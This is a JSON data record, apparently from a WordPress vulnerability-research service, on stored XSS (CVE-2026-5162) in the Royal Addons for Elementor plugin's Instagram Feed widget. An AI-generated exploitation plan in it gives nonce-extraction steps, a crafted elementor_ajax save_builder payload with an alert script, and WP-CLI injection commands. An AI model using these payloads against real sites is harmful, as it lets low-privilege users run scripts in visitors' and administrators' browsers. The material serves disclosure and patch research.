[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f4_AzByuLN07DmLMUYTWS9-mak3yI-l4PiHPvZB_8ddE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":9,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":40},"CVE-2026-5162","royal-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-via-instagram-feed-widget","Royal Addons for Elementor \u003C= 1.7.1056 - Authenticated (Contributor+) Stored Cross-Site Scripting via Instagram Feed Widget","The Royal Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Instagram Feed widget's 'instagram_follow_text' setting in all versions up to, and including, 1.7.1056 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","royal-elementor-addons",null,"\u003C=1.7.1056","1.7.1057","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-16 13:10:11","2026-04-17 01:24:36",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F16d083bc-d726-4291-bc6d-a7bf83fa78c3?source=api-prod",1,[22,23,24,25,26,27,28,29],"admin\u002Fplugin-options.php","admin\u002Ftemplates\u002Flibrary\u002Fwpr-templates-data.php","assets\u002Fcss\u002Fadmin\u002Feditor.min.css","assets\u002Fcss\u002Ffrontend.css","assets\u002Fcss\u002Ffrontend.min.css","assets\u002Fjs\u002Fadmin\u002Feditor.js","assets\u002Fjs\u002Fadmin\u002Feditor.min.js","assets\u002Fjs\u002Ffrontend.js","researched",false,3,"# Exploitation Research Plan - CVE-2026-5162\n\n## 1. Vulnerability Summary\nThe **Royal Addons for Elementor** plugin (up to v1.7.1056) contains a Stored Cross-Site Scripting (XSS) vulnerability in its **Instagram Feed** widget. The vulnerability exists because the plugin fails to sanitize or escape the `instagram_follow_text` setting before rendering it on the frontend. Authenticated users with **Contributor-level** permissions or higher can create or edit a post, add the Instagram Feed widget, and inject malicious scripts into the \"Follow Text\" field. When any user views the affected post, the script executes in their browser context.\n\n## 2. Attack Vector Analysis\n*   **Vulnerable Widget:** `wpr-instagram-feed` (as registered in `assets\u002Fjs\u002Ffrontend.js`).\n*   **Vulnerable Setting:** `instagram_follow_text`.\n*   **Authentication Level:** Contributor+ (Users who can access the Elementor editor for posts).\n*   **Entry Point:** Elementor Editor AJAX API (`elementor_ajax`).\n*   **Target Page:** Any post or page where the malicious Instagram Feed widget is embedded.\n\n## 3. Code Flow\n1.  **Input:** A Contributor-level user edits a post using the Elementor editor. They drag the \"Instagram Feed\" widget onto the page.\n2.  **Storage:** In the widget settings, the user enters a payload (e.g., `\u003Cscript>alert(document.domain)\u003C\u002Fscript>`) into the \"Follow Text\" field (`instagram_follow_text`).\n3.  **Persistence:** When the user saves the page, Elementor sends a `POST` request to `admin-ajax.php` with the action `elementor_ajax`. The widget configuration, including the malicious setting, is stored in the WordPress database under the `_elementor_data` meta key for that post.\n4.  **Render (Sink):** When the post is viewed on the frontend, the `WprAddons\\Widgets\\Wpr_Instagram_Feed::render()` method (inferred class name) retrieves the settings from post meta. The `instagram_follow_text` value is echoed directly into the HTML (likely within a button or link) without passing through `esc_html()` or `wp_kses()`.\n\n## 4. Nonce Acquisition Strategy\nElementor uses its own AJAX infrastructure for saving post data. To successfully save a widget configuration via HTTP, a valid Elementor AJAX nonce is required.\n\n1.  **Pre-requisite:** Create a post as a Contributor and ensure it is \"Edited with Elementor\".\n2.  **Step:** Navigate to the Elementor Editor for that post: `\u002Fwp-admin\u002Fpost.php?post=[POST_ID]&action=elementor`.\n3.  **Extraction:** Use the `browser_eval` tool to extract the nonce and the post ID from the Elementor configuration object.\n4.  **JavaScript Variable:** \n    *   Nonce: `window.elementorCommonConfig.ajax.nonce`\n    *   Editor Post ID: `window.elementorConfig.post_id` (this confirms the ID context).\n\n## 5. Exploitation Strategy\nThe exploit will simulate the Elementor \"Save\" action to inject the payload.\n\n### Step 1: Setup Content\nCreate a post and prepare it for Elementor.\n```bash\nwp post create --post_type=post --post_title=\"XSS Test\" --post_status=publish --post_author=contributor_user_id\nwp post meta add [POST_ID] _elementor_edit_mode \"builder\"\nwp post meta add [POST_ID] _elementor_template_type \"wp-post\"\n```\n\n### Step 2: Extract Nonce\nUse `browser_navigate` to the editor URL, then `browser_eval` to get the nonce.\n\n### Step 3: Inject Payload via HTTP Request\nSend a `POST` request to `admin-ajax.php` mimicking an Elementor save action.\n\n*   **URL:** `https:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Parameters:**\n    *   `action`: `elementor_ajax`\n    *   `_nonce`: `[EXTRACTED_NONCE]`\n    *   `actions`: A JSON string containing the `save_builder` operation.\n    *   `editor_post_id`: `[POST_ID]`\n\n**Payload Structure (Actions JSON):**\n```json\n{\n  \"save_builder\": {\n    \"action\": \"save_builder\",\n    \"data\": {\n      \"status\": \"publish\",\n      \"elements\": [\n        {\n          \"id\": \"random_id_123\",\n          \"elType\": \"widget\",\n          \"widgetType\": \"wpr-instagram-feed\",\n          \"settings\": {\n            \"instagram_follow_text\": \"\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"\n          }\n        }\n      ]\n    }\n  }\n}\n```\n\n### Step 4: Trigger Execution\nNavigate to the frontend URL of the post (`\u002F?p=[POST_ID]`) to see the script execute.\n\n## 6. Test Data Setup\n1.  **Plugin Status:** `royal-elementor-addons` and `elementor` must be active.\n2.  **User Role:** A user with the `contributor` role.\n3.  **Target Post:** A post ID where the contributor has edit permissions.\n\n## 7. Expected Results\n*   The `elementor_ajax` request should return a `200 OK` with a JSON response: `{\"success\":true,\"data\":{\"responses\":{\"save_builder\":{\"success\":true...}}}}`.\n*   The post meta `_elementor_data` for the post will contain the string `\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n*   Viewing the post frontend will result in an alert box showing the document domain.\n\n## 8. Verification Steps\n1.  **Database Check:**\n    ```bash\n    wp post meta get [POST_ID] _elementor_data\n    ```\n    Confirm the JSON contains the `instagram_follow_text` with the payload.\n2.  **HTML Source Check:**\n    Navigate to the post and check for the unescaped payload in the rendered HTML:\n    ```bash\n    # (Simulated via browser\u002FPlaywright)\n    # Search for: \u003Cscript>alert(document.domain)\u003C\u002Fscript>\n    ```\n\n## 9. Alternative Approaches\nIf the `elementor_ajax` save structure is too complex to replicate via a single `http_request`, the fallback is to use **WP-CLI** to directly inject the configuration into the post meta. This is effective for PoC environments where the goal is to prove the **Stored XSS** exists during rendering:\n\n```bash\n# Prepare the JSON structure\nPAYLOAD='[{\"id\":\"exploit\",\"elType\":\"widget\",\"widgetType\":\"wpr-instagram-feed\",\"settings\":{\"instagram_follow_text\":\"\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"}}]'\n\n# Update the meta directly\nwp post meta update [POST_ID] _elementor_data \"$PAYLOAD\"\n```\nThis confirms that if a Contributor saves this data (which Elementor allows), the frontend will execute it.","The Royal Addons for Elementor plugin (up to version 1.7.1056) is vulnerable to Stored Cross-Site Scripting because the Instagram Feed widget fails to sanitize and escape the 'instagram_follow_text' setting. This allows authenticated users with Contributor-level access or higher to inject arbitrary scripts into posts that execute in the context of any user viewing the page.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1056\u002Fadmin\u002Fplugin-options.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1057\u002Fadmin\u002Fplugin-options.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1056\u002Fadmin\u002Fplugin-options.php\t2026-04-03 11:57:32.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1057\u002Fadmin\u002Fplugin-options.php\t2026-04-10 10:58:42.000000000 +0000\n@@ -120,6 +120,8 @@\n     register_setting('wpr-extension-settings', 'wpr-parallax-multi-layer');\n     register_setting('wpr-extension-settings', 'wpr-custom-css');\n     register_setting('wpr-extension-settings', 'wpr-display-conditions');\n+    register_setting('wpr-extension-settings', 'wpr-equal-height');\n+    \u002F\u002F register_setting('wpr-extension-settings', 'wpr-column-slider');\n     register_setting('wpr-extension-settings', 'wpr-sticky-section');\n \n     \u002F\u002F Element Toggle\n@@ -1630,6 +1632,12 @@\n                         echo '\u003Cbr>\u003Cspan>Tip: Edit any Section > Navigate to Advanced tab\u003C\u002Fspan>';\n                     } elseif ( 'wpr-display-conditions' === $option_name ) {\n                         echo '\u003Cbr>\u003Cspan>Tip: Edit any Element > Navigate to Visibility tab\u003C\u002Fspan>';\n+                    } elseif ( 'wpr-column-slider' === $option_name ) {\n+                        echo '\u003Cbr>\u003Cspan>Tip: Edit any Section > Navigate to Advanced tab\u003C\u002Fspan>';\n+                        \u002F\u002F echo '\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\" target=\"_blank\">Watch Video Tutorial\u003C\u002Fa>';\n+                    } elseif ( 'wpr-equal-height' === $option_name ) {\n+                        echo '\u003Cbr>\u003Cspan>Tip: Edit any Section > Navigate to Advanced tab\u003C\u002Fspan>';\n+                        \u002F\u002F echo '\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\" target=\"_blank\">Watch Video Tutorial\u003C\u002Fa>';\n                     }\n \n                     \u002F\u002F echo '\u003Ca href=\"https:\u002F\u002Froyal-elementor-addons.com\u002Felementor-particle-effects\u002F?ref=rea-plugin-backend-extentions-prev\">'. esc_html('View Extension Demo', 'wpr-addons') .'\u003C\u002Fa>';\n... (truncated)","To exploit this vulnerability, an attacker with Contributor-level access or higher performs the following steps:\n1. Authenticate to the WordPress site and open the Elementor editor for a post or page they have permissions to edit.\n2. Extract the required security nonce from the global JavaScript object `window.elementorCommonConfig.ajax.nonce`.\n3. Send a POST request to the `\u002Fwp-admin\u002Fadmin-ajax.php` endpoint with the action `elementor_ajax`.\n4. Craft the payload using the `save_builder` operation within the `actions` parameter. The payload must include a widget of type `wpr-instagram-feed` with the `instagram_follow_text` setting containing a malicious script (e.g., `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`).\n5. Once the page is saved with the malicious widget configuration, any user (including administrators) who navigates to the frontend of that page will trigger the execution of the injected script in their browser context.","gemini-3-flash-preview","2026-04-20 20:32:53","2026-04-20 20:33:20",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","1.7.1056","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1056","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1056.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1057","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1057.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags"]